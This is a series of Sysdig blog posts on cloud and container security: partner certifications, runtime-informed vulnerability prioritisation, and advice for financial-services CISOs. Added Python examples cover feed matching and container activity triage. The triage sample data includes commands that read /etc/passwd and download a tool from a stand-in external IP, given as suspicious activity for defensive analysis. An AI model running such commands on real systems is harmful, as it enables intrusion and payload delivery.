    Sysdig Achieves the Amazon EKS Ready Designation https://sysdig.com/blog/sysdig-amazon-eks-ready/ Thu, 30 Nov 2023 00:30:00 +0000 https://sysdig.com/?p=82136 Sysdig is an Amazon Elastic Kubernetes Service Ready partner, providing cloud security for Amazon EKS and Amazon EKS Anywhere.

    Today Sysdig has been recognized for achieving the Amazon Elastic Kubernetes Service (Amazon EKS) Ready designation from Amazon Web Services (AWS). This specialization recognizes that the Sysdig cloud-native application protection platform (CNAPP) is validated by AWS Partner Solutions Architects to integrate with Amazon EKS and Amazon EKS Anywhere.

    Amazon EKS Ready Partners like Sysdig offer AWS customers the ability to customize the Kubernetes solution to fit their business needs.


    Why the AWS Service Ready Program matters

    The AWS Service Ready Program is designed to validate software products built by AWS Partners that work with specific AWS services. AWS Partner Solution Architects technically validate these software products for their sound architecture and adherence to AWS best practices.

    The Amazon EKS Ready designation helps customers quickly and easily find AWS Partner software solutions to run Kubernetes on AWS, on-premises, or at the edge. As a result, customers can spend less time evaluating new tools and more time scaling their use of solutions that work on AWS.

    Achieving the Amazon EKS Ready designation differentiates Sysdig as an AWS Partner with a product that works with Amazon EKS and Amazon EKS Anywhere and fully supports AWS customers.

    How AWS customers use Sysdig with Amazon EKS

    Sysdig’s cloud security platform helps Amazon EKS and Amazon EKS Anywhere users move faster. By correlating signals across cloud workloads, identities, and services, you’re able to quickly identify and resolve security issues.

    For businesses innovating in the cloud, every second counts. To help AWS users keep pace, Sysdig Secure provides real-time security insights built on open source Falco. Together with Amazon EKS, Sysdig helps reduce your attack surface, detect threats in real time, and accelerate incident response. Equally important, with runtime insights you’re able to prioritize the vulnerabilities, misconfigurations, permissions, and runtime threats that matter most.


    What Joint AWS and Sysdig Customers Say

    Joint AWS and Sysdig customer ICG Consulting uses Sysdig along with Amazon EKS to gain cost and staffing efficiencies that help it compete with larger consulting firms.

    Marcus Boelter, a technical consultant at ICG Consulting, explains, “Between the strength of the Sysdig technology based on Falco and its partnership with AWS, we knew we could deliver even more quickly by adopting Sysdig.”

    Read the case study.

    Learn more about Sysdig and AWS

    To sum up, as an Amazon EKS Ready Partner, Sysdig helps you effectively manage cloud security and compliance. Whether for containerized workloads and orchestration, or for your surrounding cloud services, Sysdig can help strengthen your cyber resilience and move faster in the cloud.

    To learn more, check out these resources:

    Sysdig achieves Red Hat Vulnerability Scanner Certification https://sysdig.com/blog/sysdig-achieves-red-hat-vulnerability-scanner-certification/ Fri, 10 Nov 2023 14:00:00 +0000 https://sysdig.com/?p=34624 Image vulnerability scanning is a critical first line of defense for security with containers and Kubernetes. In February 2021, Sysdig...

    Image vulnerability scanning is a critical first line of defense for security with containers and Kubernetes. In February 2021, Sysdig Secure was recognized by Red Hat as a certified Red Hat security partner. At that time, working from Sysdig’s former Vulnerability Scanner, the Sysdig team standardized Sysdig Secure on Red Hat’s published security data.

    Today, Sysdig announces the renewal of the Red Hat Vulnerability Scanner certification for the latest release of its Vulnerability Scanner Engine. With this certification, achieved through collaboration with the team at Red Hat, Sysdig can not only provide more consistent container vulnerability scanning results for Red Hat-published images and related packages, but also bring some of its killer features, like Sysdig Risk Spotlight powered by runtime insights. As a result, mutual customers benefit from a higher level of accuracy, transparency, and trust in detecting, prioritizing, and fixing Common Vulnerabilities and Exposures (CVEs) using in-use data from their environments.

    Driving consistency for scan results

    Modern application development, built on CI/CD pipelines, containers, and open source, moves at a fast pace. There is an inherent security risk as organizations assemble code to save time, instead of writing it from scratch. Finding ways to automate security scanning for images is top of mind for DevOps teams. Image scanning helps to secure the developer build pipeline and automates the analysis of image contents and container configurations to identify and classify known security issues, vulnerabilities, and bad practices.

    Red Hat recognized that vulnerability risk assessments for customers were often inconsistent due to different and varying security data sources and practices across partner offerings. We know this challenge! Sysdig Secure taps into vulnerability feeds from 15+ trusted sources, like Red Hat. Each of these CVE feeds is unique, yet valuable to the extent that correlating the contents of an image with a broader set of CVE data ensures a greater level of insight into vulnerable packages, files, etc. Standardization is a great move – Red Hat has the right idea. Consistency helps eliminate misinterpretations and saves time for teams building and running containers.

    (Figure: Vulnerability Management overview – Sysdig Secure)

    How it works

    At a high level, here’s how this collaboration and standardization works.

    1. Sysdig Secure consumes the publicly available Red Hat OVAL v2 security data feed.
    2. With this information, Sysdig image scanning can determine which vulnerabilities affect Red Hat-supported packages and whether a fix (patch) is available.
    3. Sysdig Vulnerability Scanner Engine scans images throughout the software lifecycle: pipeline, registry, and runtime.
    4. Sysdig Secure displays the appropriate severity ratings for CVEs in scan results for every stage. For those images deployed at runtime, the in-use packages are also reported. That way, Red Hat users can prioritize and fix the security issues that matter most.

    (Figure: Vulnerability Management with Runtime Insights – Sysdig Secure)

    Securing build pipelines

    Nowadays, it’s quite common to see DevOps teams embracing “shift left” security practices. Their goal is to apply a security lens earlier in the development lifecycle. The annual Sysdig 2023 Cloud-Native Security and Usage Report found that 42% of images are scanned for the first time in the earliest stages of the software lifecycle, while around 50% of images are scanned for the first time at runtime.

    A likely reason runtime is where most first-time scans occur is the use of third-party software downloaded from vendors. Because vendors are considered trusted sources, DevOps teams may presume the images are secure and skip the time and effort of scanning in the CI/CD pipeline and registry.

    Considering security implications for container images earlier in the development lifecycle helps close the door to attackers and reduce the possibility of unexpected and unwanted activity impacting your running containers.

    The Power of Runtime Insights

    As indicated in the Sysdig 2023 Cloud-Native Security and Usage Report above, a significant number of images are scanned for the first time at runtime. This indicates that many users may be exposed to potential security threats in the last stage of the software lifecycle. The recommendation is clear: the earlier you check for vulnerabilities, the better. Detecting and fixing security issues in the early development stages prevents you from running into serious problems when your workloads are up and running in production.

    However, regardless of whether you enforce a shift left approach, companies still need to detect vulnerabilities and malicious code at runtime. The Sysdig TRT (Threat Research Team), after a thorough analysis, found that more than 10% of malicious images are completely undetectable because of the advanced techniques attackers use to hide malicious code. That elevates the importance of detecting and responding to threats at cloud speed. The Sysdig Vulnerability Scanner gives users runtime insights to prioritize and fix security issues with runtime context, focusing DevSecOps team efforts on fixing the most urgent problems first.

    If you want to learn more about the latest cloud threat patterns and how to overcome those challenges, check out the Sysdig 2023 Global Cloud Threat Report.

    (Figure: In-use package details for OpenShift images – Sysdig Secure)

    Conclusion

    By driving consistency and standardization with this new Red Hat Vulnerability Scanner Certification, Red Hat is helping customers who use Red Hat Certified security partner solutions have a more streamlined experience for assessing vulnerability risks of Red Hat products and packages. Aligning Sysdig Secure with Red Hat’s strategy and standard means Sysdig customers can gain improved clarity and accuracy for image scanning with CI/CD pipelines and registries.

    If you want to learn more about how Sysdig helps secure Red Hat OpenShift and containers, visit our Red Hat partnership ecosystem page.

    Prioritize Vulnerabilities Faster with Checkmarx and Sysdig https://sysdig.com/blog/prioritize-vulnerabilities-faster-with-checkmarx-and-sysdig/ Tue, 08 Aug 2023 10:50:00 +0000 https://sysdig.com/?p=77390 Organizations modernizing applications in the cloud find themselves drowning in vulnerabilities. There are too many alerts and not enough time...

    Organizations modernizing applications in the cloud find themselves drowning in vulnerabilities. There are too many alerts and not enough time to address them all. Sysdig and Checkmarx announced a partnership today focused on solving this problem. By bringing runtime insights from Sysdig’s Cloud-Native Application Protection Platform (CNAPP) into the Checkmarx One AppSec platform, application security teams will have a new tool to reduce vulnerability noise up to 95% and help developers quickly get to the issues they need to address first.

    Shift-left security has a problem: Noise

    Shifting security left is key to ensuring companies reduce risks at very early development stages. Finding security vulnerabilities at the early stages of development is never the problem. Identifying vulnerabilities early in the development lifecycle is good; the real challenge is determining which security issues are noise and which pose real risk. Developers need help sorting through the mountain of issues to determine what they should fix first.

    Runtime insights reduce vulnerability noise by up to 95%

    Sysdig’s unique position at runtime provides the ability to profile running container images to identify in-use packages with vulnerabilities. By feeding this information back to vulnerability management tools, runtime insights help filter out vulnerable packages that are not actually used by the application. This helps developers and security teams focus on what’s really important, keeping development and delivery moving at a rapid pace.

    Through a set of APIs, Sysdig makes the in-use package information available for use with external tools. This is the work we’re doing together with Checkmarx.

    Using Sysdig runtime insights with Checkmarx One

    Checkmarx Software Composition Analysis (SCA), part of the Checkmarx One platform, helps teams find vulnerable open source packages in their code and get remediation guidance to help quickly reduce open source risk. Runtime insights from Sysdig will add a new dimension for prioritizing and filtering vulnerabilities so developers can focus first on in-use packages.

    Reduce vulnerability fatigue

    Checkmarx SCA with Sysdig Secure provides an effective developer feedback loop with accurate, relevant, and actionable insight integrated into the software lifecycle. By focusing on vulnerabilities with runtime exposure, Checkmarx and Sysdig will help users gain a clear view of vulnerable components actually invoked – and which are not. This significantly reduces developer workload in terms of what needs to be remediated to address actual risk.

    Focused remediation = faster delivery

    Detecting and responding to security threats earlier and more efficiently has a direct impact on developer productivity. Teams who are able to focus more on application development and deployment, and less on unnecessary vulnerability remediation, will be better equipped to keep pace with rapid software delivery. This means a much faster time-to-market (TTM).

    Shift left and shield right for a complete cloud-native security solution

    We’re excited about the new Checkmarx and Sysdig partnership. Together we bring the cloud and cloud-native security solutions organizations need to effectively identify and respond to the vulnerabilities and threats from source to run.

    Want to learn more about how it works? Read our follow-up blog: How to Prioritize Vulnerabilities with Checkmarx and Sysdig Runtime Insights.

    Additional resources:

    Shift Left is Only Part of Secure Software Delivery in Financial Services https://sysdig.com/blog/financial-services-beyond-shift-left-security/ Thu, 27 Jul 2023 16:00:00 +0000 https://sysdig.com/?p=76773 Assessing the security of modern cloud applications requires security practices in development as well as production. Learn how financial services organizations can secure their cloud apps across the entire lifecycle.

    The way we manage our money has changed dramatically. In little more than a decade, we’ve gone from branch-led services to feature-rich apps offering 24/7 access to our money. Open Banking is driving product innovation, fintechs are setting a new benchmark for customer-centric experiences, and AI is taking personalization to a new level. Financial services have never been so accessible and convenient.

    This startling progress could not have happened without relatively recent advances in software development, delivery, and operations.

    Among those advances are the adoption of DevOps practices, continuous integration and continuous deployment (CI/CD) pipelines, use of cloud technologies, and automating everything from infrastructure provisioning to testing and quality assurance. These advances enable FinServ developers to deliver software faster, and to think about security and compliance earlier in design and development to ship safer software.

    What is “Shift Left” and why does it matter?

    “Shift left” is a philosophy for addressing the pitfalls of traditional waterfall-style development. In waterfall, a number of IT teams work over the course of many weeks or months, culminating in a big and beautiful software release. Of course, people make mistakes, forget things, and maybe don’t communicate well with each other. When it turns out that application elements don’t interoperate well, the teams frantically attempt to fix what’s possible and jettison what isn’t, with a very serious deadline staring them in the face. Products inevitably ship late, still somewhat broken, and with security bolted on as an afterthought.

    To shift left means to introduce security processes and tooling earlier into the design and development phases. Security should be just as critical as functionality and quality. It’s a great idea because discovering a build-failing vulnerability in a critical dependency after you’ve built dozens of functionalities on top of it hurts a lot more than if it’s found before you build anything at all. Maybe fixing the problem is as simple as using a newer version of a dependency, but now you have to make sure everything you’ve customized still works as intended.

    There are a number of forms of application security testing (AST) that aim to detect code-level issues early in the systems development life cycle (SDLC). Two common types of application security testing when shifting left are software composition analysis (SCA) and static application security testing (SAST). Put simply, SAST tests the custom code your developers write; SCA tests the dependencies you include in your code.

    Assessing the security of modern applications requires both testing types. If you believe shift left means not only finding problems but also fixing them, then developer-friendly tooling is necessary. Exactly what that means can be subjective depending on developer workflows in the organization, but at the very least, developers need self-service, seamless integration into their existing CI/CD toolchains and actionable results. Because most developers aren’t security experts, security findings must prioritize the riskiest problems, point to the source of the issue, and provide contextualized fixes, rather than making the developer hunt for them on their own.

    Augmenting AST with runtime intelligence

    One challenge with doing a lot of early testing – especially security testing – is that the more you test, the more findings you discover. Unfortunately, some of the results will be false positives and others may be true positives that pose a relatively low risk. Development teams with a high degree of security expertise must sift through and vet findings to prioritize flaws that are severe and actionable, but such practitioners are in short supply and this type of work is tedious.

    Addressing the pitfalls of security testing isn’t simple, and it involves gathering as much contextual information as possible to begin to reason about the risk associated with each finding, usually expressed by what exploitable code is actually exercised.

    Reasoning about vulnerability risk is not easy. We try to rank the criticality of issues to decide on an action. We can split the problem into two parts:

    1. The context of the vulnerability itself includes metrics of severity, like the CVSS score, and threat intelligence, like whether exploits are publicly available or attacks are prevalent in the wild. This information is readily available from scanning tools and third-party sources like NVD, MITRE, and CISA.
    2. The afflicted asset’s environmental context, however, is specific to your application and your infrastructure. Only your organization can really fill this part in. For example, are the application and data subject to specific compliance standards like PCI-DSS and GDPR? Is the impacted application protected by mitigating security controls? Is it exposed to the internet? Does the vulnerable component even get used at all? This is difficult or impossible to know until the application is running in its intended production environment.
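The two-part risk model above, together with the "How it works" steps from the Red Hat scanner post earlier on this page, as an added Python example (not Sysdig's code or API): a constructed OVAL-style feed is matched against a constructed image inventory using a simplified RPM version comparison, and findings are then ranked so in-use packages come first, with the share of filtered noise measured. Feed entries, package versions, the placeholder CVE ids and the scoring weights are all assumptions.

```python
# Added example, constructed data; version compare is a simplified stand-in for rpmvercmp.
import re
from dataclasses import dataclass

# Constructed feed entries in the shape of what an OVAL definition conveys:
# affected package, fixing version, vendor severity. IDs are placeholders, not real CVEs.
FEED = [
    {"id": "CVE-0000-0001", "package": "openssl", "fixed_in": "1:1.1.1k-9", "severity": "Important", "exploit_public": True},
    {"id": "CVE-0000-0002", "package": "curl", "fixed_in": "7.76.1-23", "severity": "Moderate", "exploit_public": False},
    {"id": "CVE-0000-0003", "package": "libxml2", "fixed_in": "2.9.13-3", "severity": "Critical", "exploit_public": True},
    {"id": "CVE-0000-0004", "package": "glibc", "fixed_in": None, "severity": "Low", "exploit_public": False},  # no fix yet
]
# Constructed image inventory: package name -> installed [epoch:]version-release.
IMAGE_PACKAGES = {
    "openssl": "1:1.1.1k-7",
    "curl": "7.76.1-23",           # already at the fixed version
    "libxml2": "2.9.13-1",
    "glibc": "2.34-40",
    "vim-minimal": "8.2.2637-16",  # no feed entry at all
}
# Constructed runtime insight: packages whose files were loaded by a running process.
IN_USE = {"openssl", "glibc"}
SEVERITY_WEIGHT = {"Critical": 4, "Important": 3, "Moderate": 2, "Low": 1}
_TOKEN = re.compile(r"\d+|[A-Za-z]+")

def parse_evr(evr):
    """Split '[epoch:]version[-release]' into (int epoch, version, release)."""
    epoch, sep, rest = evr.partition(":")
    if not sep:
        epoch, rest = "0", evr
    version, _, release = rest.partition("-")
    return int(epoch), version, release

def _cmp_segment(a, b):
    """Compare dotted segments token by token; numeric tokens compare as integers."""
    ta, tb = _TOKEN.findall(a), _TOKEN.findall(b)
    for x, y in zip(ta, tb):
        if x.isdigit() and y.isdigit():
            if int(x) != int(y):
                return 1 if int(x) > int(y) else -1
        elif x.isdigit() != y.isdigit():
            return 1 if x.isdigit() else -1  # numeric token sorts newer than alpha
        elif x != y:
            return 1 if x > y else -1
    return (len(ta) > len(tb)) - (len(ta) < len(tb))

def compare_evr(a, b):
    """-1, 0 or 1 as a is older than, equal to, or newer than b."""
    ea, va, ra = parse_evr(a)
    eb, vb, rb = parse_evr(b)
    if ea != eb:
        return 1 if ea > eb else -1
    return _cmp_segment(va, vb) or _cmp_segment(ra, rb)

@dataclass
class Finding:
    vuln_id: str
    package: str
    installed: str
    fixed_in: "str | None"
    severity: str
    exploit_public: bool
    in_use: bool = False
    score: int = 0

def match_feed(feed, packages):
    """Steps 1-2: a package is affected when no fix exists or it is older than the fix."""
    findings = []
    for entry in feed:
        installed = packages.get(entry["package"])
        if installed is None:
            continue  # package not in this image
        fixed = entry["fixed_in"]
        if fixed is not None and compare_evr(installed, fixed) >= 0:
            continue  # installed version already carries the fix
        findings.append(Finding(entry["id"], entry["package"], installed, fixed,
                                entry["severity"], entry["exploit_public"]))
    return findings

def prioritize(findings, in_use, internet_exposed):
    """Step 4: vulnerability context (severity, public exploit) plus environmental
    context (in use, exposed). In-use packages always rank ahead of unused ones."""
    for f in findings:
        f.in_use = f.package in in_use
        f.score = (SEVERITY_WEIGHT[f.severity] + (2 if f.exploit_public else 0)
                   + (1 if internet_exposed else 0))
    return sorted(findings, key=lambda f: (f.in_use, f.score), reverse=True)

def noise_fraction(findings):
    """Share of findings not in use, i.e. what runtime insight lets you filter out."""
    return sum(not f.in_use for f in findings) / len(findings) if findings else 0.0

if __name__ == "__main__":
    ranked = prioritize(match_feed(FEED, IMAGE_PACKAGES), IN_USE, internet_exposed=True)
    for f in ranked:
        print(f"{f.vuln_id} {f.package} {f.installed} in_use={f.in_use} score={f.score}")
    print(f"noise filtered: {noise_fraction(ranked):.0%}")
```

Note that the unused libxml2 finding carries the highest raw score yet ranks last: that is the page's point that in-use status, not CVSS alone, should drive what gets fixed first.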

    Shift left is a way forward for modern cybersecurity, but the approach can be vastly enriched by pulling in Runtime Insights. This helps to prioritize what to fix first, removes friction, saves cycles of numerous IT teams, and reduces your organization’s vulnerability risk.

    For Sysdig customer WorldPay, runtime context has proved invaluable in freeing up teams to concentrate on revenue-generating work. “If my team logs in and sees 500 vulnerabilities, they then think, ‘am I going to fix our vulnerability or am I going to spend my time developing something which creates some money?’” said Bernd Malmqvist, WorldPay’s Principal Container Platform Engineer. “Showing us what is important and how to fix it is key to reducing our risk.”

    What happens after release?

    The whole point of shift left is to release secure and compliant software faster, but what happens next? Your flawless, beautiful code is delighting your customers with its stunning feature set and impressive performance. Then, on some idle Friday afternoon, right before what should have been a long holiday weekend, you get hit with a horrendous zero-day that you could never have predicted even if you tried.

    When that happens, you need to respond by quickly identifying all of the affected workloads running in your environment and prioritizing them for remediation. You may need to take those workloads offline to patch immediately, limit network access to them, or otherwise mitigate the problem if a patch is either unavailable or taking too long to deploy. The point is that in real life, shift left is only one part of a successful security program, and the protective, detective, and remediation activities for your production environments on the right are also critically important to your organization’s safety and success.

    Conclusion

    Shift left alone was never going to solve all security problems, but it does create foundations for reliable, fast, and secure software delivery pipelines. Security and development teams alike often suffer from a deluge of noise and few useful signals. What they really need are consistent and prescriptive ways to make sound decisions about risk. Gathering context from multiple sources through multiple layers of the stack, including runtime insights, substantially improves the quality of the information that DevSecOps teams receive from their tools and must act on.

    Combining shift left and shield right best practices allows financial institutions to improve DevSecOps efficiency and accelerate software development without compromising security and compliance.

    With developers able to spend less time on fixing minor vulnerabilities and maintaining compliance, they can focus on what they do best: building a better digital experience for customers.

    Effi Goldstein, director of products at Snyk, co-authored this article. Check out Sysdig and Snyk’s 2022 Container Security Trends: Expert Panel Livestream for more information.

    Five Things CISOs in Financial Services can do to make Containers Secure and Compliant https://sysdig.com/blog/cisos-financial-services/ Wed, 26 Jul 2023 15:30:00 +0000 https://sysdig.com/?p=76563 As competition ramps up in the financial services sector, agile cloud application development is critical to delivering seamless digital experiences customers want. Cloud-native development brings new security and compliance implications. Learn more on what you can do to respond to cloud security risk.

    As competition ramps up in the financial services sector, agile and efficient application development is critical to delivering the seamless digital experiences today’s customers want. Chances are, if you’re not already moving applications to cloud and containers, you’re considering it.

    But cloud-native development also brings security and compliance implications you may not have fully thought through. With 72% of containers living just five minutes or less, many legacy tools and processes simply cannot provide the visibility needed to satisfy auditors and stop breaches.

    It goes without saying that the stakes are high. Financial institutions remain a premier target for cybercriminals, and adversaries’ tactics are increasingly sophisticated. A 2022 survey found that 74% of global financial institutions experienced at least one ransomware attack over the previous year. Meanwhile, regulatory requirements are becoming ever more onerous and the penalties can be severe: current fines for violating PCI regulations stand at $5,000 to $100,000 per month until compliance is established.

    In the absence of best practices, mistakes create openings for attackers. For instance, in 2019, a hacker managed to access over 100 million Capital One credit card applications and steal thousands of social security and bank account details. The attacker, a Capital One software engineer, gained access via a misconfigured web application firewall in a lapse that cost the company hundreds of millions of dollars. As development teams increasingly rely on open source software and third-party code, threats to container security are also arising from the software supply chain. In the recent Federal Civilian Executive Branch (FCEB) agency breach, the Iranian government exploited the Log4Shell vulnerability to deploy a cryptominer, steal credentials, and maintain persistence in the FCEB environment.

    Speed is of the essence for safety and success

    The later vulnerabilities are discovered, the greater the impact on your development speed – and your organization’s competitive edge. At a time when fast time-to-market is more urgent than ever to retain customers and meet the expectations of the next generation of consumers, CISOs must ensure security is explicitly designed into cloud and container environments to minimize last-minute delays.

    To counter the risks, your security tool set must integrate specific FinServ security and compliance safeguards into DevOps processes. In addition to scanning for vulnerabilities, it’s important to also address runtime security and incident response.

    Here are five key priorities you can work toward in your organization:

    1. Scan for vulnerabilities in the build process

    “Shifting left” involves building security checks into development so vulnerabilities are addressed before the container is deployed in production. These checks, which can be automated, help identify vulnerabilities faster and earlier and enable you to validate build configurations and image attributes. They can also scan third-party container libraries before applications are deployed to production. To put the importance of this critical step into perspective, Sysdig recently analyzed more than seven million containers that our customers are using on a daily basis. We found that 87% of container images running in production have a critical or high severity vulnerability. Typically, companies will fix these issues before production release.

    2. Secure against runtime threats and attacks

    “Shifting left” will help ensure the container is not deployed with vulnerabilities, but you also need to protect against emerging threats that can compromise your environment during runtime. This requires runtime detection of violations spanning a wide range of policies, such as unauthorized user activity, excessive privileges to containers, unauthorized network connections, and so on. Since it’s difficult to create manual policies for comprehensively detecting runtime threats, leveraging community-sourced and machine-learning policies will become critical. Another critical element is using an admission controller to govern allowable requests to the API server and prevent workloads with risky configurations, vulnerabilities, or other aspects that don’t meet security standards from running.

    3. Continuously validate posture and compliance

    CIS benchmarks provide a minimal set of hardening guidelines for containers. Regulatory requirements are also stringent and getting more so, and regulators increasingly enforce onerous financial penalties for failure to comply. However, meeting requirements such as GDPR, PCI-DSS, NIST, and ISO can be complex in container environments that change continually. According to our customer study, only 6% of containers now live for a week or more. Validating posture and compliance requires mapping each regulation and benchmark to specific policies and checks, both for the build phase of the software development life cycle and for runtime, to ensure continual compliance in production.

    4. Manage excessive cloud permissions

    Cloud environments contain many users and resources that need access and privileges to do their work. Over time, controlling the access rights and permissions granted to cloud identities becomes a struggle, and organizations end up with unused identities and excessive permissions that adversaries can target as entry points. Full visibility into cloud assets and identities, so that excessive permissions can be detected and removed, is key to enforcing least-privilege policies that grant just enough permission to perform the necessary actions. Cloud Infrastructure Entitlements Management (CIEM) tools help by automatically discovering all identity and access management (IAM) roles, permissions, and usage and recommending the right permission settings to safeguard your business.

    90% of granted cloud permissions are unused (source: Sysdig 2023 Cloud-Native Security and Usage Report).

    5. Ensure you have a way to audit activity and investigate security events

    With such short life spans, it is imperative to record detailed container activity in a form that is retained after the container has stopped. In the event of anomalous behavior, you want to know what processes were spawned, what connections were made, what files were modified, and what HTTP requests were processed. You then need to correlate this system activity with user activity: which users accessed the container, and what did they do? With access to this depth of container activity you can effectively triage what happened and respond quickly; without it, you are blind to what happened.
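    The triage described above, as an added example that is not Sysdig's code: a function that walks retained activity for a container that has already stopped, lists the processes, connections, files and HTTP requests, and attributes each event to the user whose exec session produced it. The event schema and the sample events are constructed for this example; a real activity recorder will use its own format.

```python
# Added example (not Sysdig's code): post-mortem triage of retained
# container activity, correlating system events with the user session
# that produced them. Event format and sample data are constructed.
from collections import defaultdict

# Constructed sample: events kept after container "c1" stopped. An "exec"
# event records a human entering the container and opening session "s1";
# later events carry the session they happened in (None = no session).
EVENTS = [
    {"ts": 1, "container": "c1", "kind": "exec", "user": "alice", "session": "s1"},
    {"ts": 2, "container": "c1", "kind": "proc", "session": "s1", "cmd": "cat /etc/passwd"},
    {"ts": 3, "container": "c1", "kind": "http", "session": None, "request": "GET /api/accounts"},
    {"ts": 4, "container": "c1", "kind": "proc", "session": "s1", "cmd": "curl -o /tmp/tool http://203.0.113.9/tool"},
    {"ts": 5, "container": "c1", "kind": "conn", "session": "s1", "dst": "203.0.113.9:80"},
    {"ts": 6, "container": "c1", "kind": "file", "session": "s1", "path": "/tmp/tool", "op": "write"},
    {"ts": 7, "container": "c2", "kind": "proc", "session": "s9", "cmd": "ls"},
    {"ts": 8, "container": "c1", "kind": "stop"},
]

def triage(events, container):
    """Summarise what happened in `container` and who did it.

    Returns the spawned commands, outbound connections, modified files and
    HTTP requests, plus a per-user list of (ts, kind) for activity that
    can be attributed to that user's interactive session.
    """
    own = sorted((e for e in events if e["container"] == container),
                 key=lambda e: e["ts"])
    # Map each interactive session to the user who opened it.
    session_user = {e["session"]: e["user"] for e in own if e["kind"] == "exec"}
    summary = {"processes": [], "connections": [], "files": [], "http": [],
               "by_user": defaultdict(list)}
    for e in own:
        if e["kind"] == "proc":
            summary["processes"].append(e["cmd"])
        elif e["kind"] == "conn":
            summary["connections"].append(e["dst"])
        elif e["kind"] == "file":
            summary["files"].append(f'{e["op"]} {e["path"]}')
        elif e["kind"] == "http":
            summary["http"].append(e["request"])
        else:
            continue  # exec/stop are bookkeeping, not activity
        user = session_user.get(e.get("session"))
        if user:
            summary["by_user"][user].append((e["ts"], e["kind"]))
    summary["by_user"] = dict(summary["by_user"])
    return summary
```

    Events with no session (here the HTTP request) stay in the activity lists but are not attributed to anyone, which is the gap that correlating system and user activity is meant to close.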

    Conclusion

    As organizations increase their use of containers and Kubernetes for critical applications, efforts to exploit these technologies will escalate.

    CISOs who rethink their security processes with these five aspects in mind will be better equipped to face security threats across their containers and cloud, in a cohesive manner that empowers innovation.

    Interested in container security and compliance? You might enjoy these other resources:

    · Dig deeper with our comprehensive Kubernetes security guide.

    · Learn why PCI compliance is so challenging for containers.

    · And finally, discover how the Sysdig platform can help you. Request a demo today!

    The post Five Things CISOs in Financial Services can do to make Containers Secure and Compliant appeared first on Sysdig.

    ]]>